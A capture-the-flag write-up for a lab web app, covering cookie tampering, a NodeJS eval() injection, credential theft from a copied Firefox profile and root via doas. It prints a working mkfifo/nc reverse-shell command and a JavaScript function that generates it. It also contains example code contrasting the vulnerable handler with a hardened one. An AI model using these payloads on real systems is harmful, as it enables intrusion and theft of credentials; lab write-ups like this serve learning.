Target IP: 10.10.255.64
Challenge showcasing a web app and simple privilege escalation. Can you find the glitch?
There is only one TCP port open on the target machine: HTTP on port 80.
Port 80: HTTP
The screenshot above shows the landing page of the web application.
The source code of this page contains the interesting information shown above. JavaScript is embedded directly in the page, including a function called getAccess(). This function calls /api/access and prints the response to the browser console.
I executed getAccess() from the browser console and received the token dGhpc19pc19ub3RfcmVhbA==, as shown above.
Base64-decoding the token gives the string this_is_not_real.
A directory brute-force reveals an interesting entry, /secret.
The /secret page is empty. However, I noticed that the application sets a cookie whose value I can change. Maybe I can set it to this_is_not_real?
After changing the cookie value to this_is_not_real and refreshing the page, its content changed to what is shown above.
The default page of the application on port 80 also changed, as shown above.
Fuzzing the /api path shows another endpoint, /api/items.
The contents of /api/items are shown above.
Changing the request method from GET to POST makes the server return the message there_is_a_glitch_in_the_matrix, as shown above.
Adding a cmd parameter changes the response again: the server returns the error message above, which reveals that the parameter value is passed to eval() in a NodeJS application. That makes it possible to escalate this to a reverse shell.
A quick search shows that require("child_process").exec() can be used from such an eval() to run shell commands, and therefore to obtain a reverse shell. With a listener waiting on port 8443, I sent the reverse shell rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%2010.14.55.153%208443%20%3E%2Ftmp%2Ff (the URL-encoded form of rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.14.55.153 8443 >/tmp/f) with the POST method and received a connection. Now I have a foothold on the target machine as the user user.
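To make the eval() injection concrete, here is a small model of the /api/items behaviour described above. It is an added example written for this write-up, not code from the room: a handler that passes cmd straight to eval(), as the error message indicates the real one does, next to a hardened version that treats cmd as data, plus the construction of the exact URL-encoded payload used above. The handler names, the item list and the action names are assumptions, as is whether cmd travels in the query string or the POST body; the model accepts URLSearchParams either way.

```javascript
// Added example, not the room's source. Models the observed /api/items
// behaviour next to a hardened handler, and builds the reverse-shell payload.

// Constructed sample data standing in for whatever /api/items really returns.
const ITEMS = ["item-1", "item-2"];

// Vulnerable handler (assumed shape): GET lists items, a POST without cmd
// answers with the "glitch" string, and a POST with cmd hands the raw string
// to eval(). In the real app eval runs inside the Node module, so the caller
// gets the module's scope, including require("child_process").
function vulnerableItems(method, params) {
  if (method === "GET") return { status: 200, body: ITEMS };
  if (method !== "POST") return { status: 405, body: "method not allowed" };
  const cmd = params.get("cmd");
  if (cmd === null) return { status: 200, body: "there_is_a_glitch_in_the_matrix" };
  try {
    return { status: 200, body: eval(cmd) }; // arbitrary code execution
  } catch (e) {
    return { status: 500, body: String(e) }; // the kind of error the write-up saw
  }
}

// Hardened handler: cmd selects one of a fixed set of server-side actions and
// is never parsed as code. Unknown values are rejected, not interpreted.
const ACTIONS = {
  list: () => ITEMS,
  count: () => ITEMS.length,
};
function hardenedItems(method, params) {
  if (method === "GET") return { status: 200, body: ITEMS };
  if (method !== "POST") return { status: 405, body: "method not allowed" };
  const cmd = params.get("cmd") ?? "list";
  if (!Object.prototype.hasOwnProperty.call(ACTIONS, cmd)) {
    return { status: 400, body: "unknown cmd" };
  }
  return { status: 200, body: ACTIONS[cmd]() };
}

// The mkfifo reverse shell from the write-up, parameterised on the listener.
function reverseShellCommand(lhost, lport) {
  return `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc ${lhost} ${lport} >/tmp/f`;
}

// URL-encoded the way it was sent in the request above.
function encodedReverseShell(lhost, lport) {
  return encodeURIComponent(reverseShellCommand(lhost, lport));
}

// What eval() ends up executing once the shell command is wrapped in
// child_process.exec (JSON.stringify produces a valid JS string literal).
function evalPayload(lhost, lport) {
  return `require("child_process").exec(${JSON.stringify(reverseShellCommand(lhost, lport))})`;
}
```

Posting cmd=6*7 to the vulnerable handler returns 42, which is all the proof needed that arbitrary code runs; the same request to the hardened handler gets a 400. The fix is not input filtering around eval() but never handing client input to eval() at all.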
Running find / -perm -u=s -type f 2>/dev/null lists the SUID binaries and shows /usr/local/bin/doas. However, doas refuses to run commands for the user user, so another account is needed.
I transferred the user's .firefox profile directory to my machine using nc.
Opening that profile locally with firefox --profile b5w4643p.default-release --allow-downgrade (the flag bypasses Firefox's downgrade protection, which otherwise refuses to open a profile last used by a newer Firefox) and looking at the saved logins gave me the password of the user v0id. Note that saved logins are only readable this way when the profile has no primary password set.
Using the new password love_the_void, I successfully switched to the user v0id.
I escalated my privileges to root with the doas binary found earlier: doas -u root /bin/bash gives a root shell.
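The reason doas works for v0id but not for user is the policy in /etc/doas.conf, which the write-up does not show. The following is an added example, not code from the room, that parses a doas.conf and applies the reference implementation's matching rules: every rule is checked and the last matching one wins, a rule with no "as" clause matches any target user, and "args" alone means the command must be run with no arguments. The sample configuration is constructed for illustration and is not the target's file.

```javascript
// Added example, not from the room: evaluate a doas.conf the way doas does,
// to see which users may run which commands as root.

// Constructed sample policy (assumption; the real /etc/doas.conf is unknown).
const SAMPLE_DOAS_CONF = `
# constructed example, not the target's file
permit persist :wheel
deny user
permit user as root cmd /usr/bin/id args
permit nopass v0id as root cmd /bin/bash
`;

const OPTIONS = ["nopass", "nolog", "persist", "keepenv"];

// Parse lines of the form
//   permit|deny [options] identity [as target] [cmd command [args ...]]
function parseDoasConf(text) {
  const rules = [];
  for (const raw of text.split("\n")) {
    const line = raw.replace(/#.*/, "").trim();
    if (!line) continue;
    const tok = line.split(/\s+/);
    const rule = { action: tok.shift(), options: [], identity: null, target: null, cmd: null, args: null };
    if (rule.action !== "permit" && rule.action !== "deny") throw new Error("bad rule: " + line);
    for (;;) {
      if (OPTIONS.includes(tok[0])) { rule.options.push(tok.shift()); continue; }
      // setenv { ... } is accepted and skipped; it does not affect matching.
      if (tok[0] === "setenv") { tok.shift(); while (tok.length && tok.shift() !== "}") {} continue; }
      break;
    }
    rule.identity = tok.shift();                       // user or :group
    if (tok[0] === "as") { tok.shift(); rule.target = tok.shift(); }
    if (tok[0] === "cmd") { tok.shift(); rule.cmd = tok.shift(); }
    if (tok[0] === "args") { tok.shift(); rule.args = tok; } // may be empty: "no arguments"
    rules.push(rule);
  }
  return rules;
}

// doas semantics: check every rule, the last one that matches decides.
// who = { user, groups }, target = requested user, cmd/args = the command.
function doasDecision(rules, who, target, cmd, args) {
  let matched = null;
  for (const r of rules) {
    const idOk = r.identity.startsWith(":")
      ? who.groups.includes(r.identity.slice(1))
      : r.identity === who.user;
    if (!idOk) continue;
    if (r.target !== null && r.target !== target) continue; // no "as" matches any target
    if (r.cmd !== null && r.cmd !== cmd) continue;
    if (r.args !== null && r.args.join(" ") !== args.join(" ")) continue;
    matched = r;
  }
  if (matched === null) return { allowed: false, options: [], reason: "no matching rule" };
  return { allowed: matched.action === "permit", options: matched.options, reason: matched.action };
}
```

With this policy, user cannot get a root shell (the deny rule is the last match for /bin/bash, and the later permit only covers /usr/bin/id with no arguments), while v0id can run /bin/bash as root without a password. On the target itself, if /etc/doas.conf is readable, doas -C /etc/doas.conf -u root /bin/bash asks doas the same question and prints permit, permit nopass or deny without executing anything.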
The user.txt flag, located in the home directory of the user user.
The root.txt flag.